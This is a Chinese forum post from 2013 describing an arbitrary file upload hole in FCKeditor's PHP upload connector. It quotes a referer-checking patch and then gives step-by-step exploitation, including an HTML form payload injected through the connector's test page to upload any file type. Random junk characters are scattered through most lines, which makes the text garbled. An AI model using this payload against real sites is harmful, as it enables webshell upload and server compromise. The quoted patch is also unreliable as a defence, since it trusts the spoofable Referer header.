漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php5 C& m/ `. N) |' [7 V0 e
网上给出的修复方案是
9 v5 Y2 O) g% F修复方法,删除FCK编辑器用其他的编辑器5 S+ J+ X; A) [* V& |
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件/ h6 X( h4 P( s6 e* J
在
. |2 q2 s$ G! H, } {require(‘config.php’);- ]" F2 }1 g }7 X5 Q# z' ~/ x
require(‘util.php’); d- _! z" W/ s& T
的下面添加以下代码—————————–
# p$ ^* |! D% s7 b3 X8 R//防止外部提交
! a( p( m) u2 E: M1 i a5 {function outsidepost()
; Z: ~! o# x6 e; ?{
4 R% I( K1 U1 A5 P% F( V: Q$servername=$_SERVER['SERVER_NAME'];/ s1 m4 _% a5 P
$sub_from=@$_SERVER['HTTP_REFERER'];# c( [' {; R* a' T5 m: P
$sub_len=strlen($servername);$ n' j$ y2 W1 ~6 H; J
$checkfrom=substr($sub_from,7,$sub_len);
5 _* m4 S& ^$ W8 q& V' U$ sif($checkfrom!=$servername){
: C, [% ?& ^! Cecho(“you don’t outsidepost!”);3 q: H0 s7 n) e
exit;
6 q8 v6 g, |3 _}8 l: t2 j) H. R* @0 f0 {9 L
}
& ^$ q9 k; C ~+ ]; V, ?6 E: A! M/ houtsidepost();
) n$ ^3 W2 h7 U6 k2 G g0 H' |+ B防止外部提交,但是没有防止内部提交,
% v. A9 C" C4 U( h* v利用方法:
0 i# `' j3 U7 [2 _4 f Q! S1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
/ I4 p; i7 V. q. S2,在Current Folder 框输入9 Q& w3 f3 b4 |. {6 S% _
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
: a- z$ y: F+ S2 _; I9 L( z, q! v然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。5 ]0 Z& R m3 U4 z0 r
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
分享
支持
反对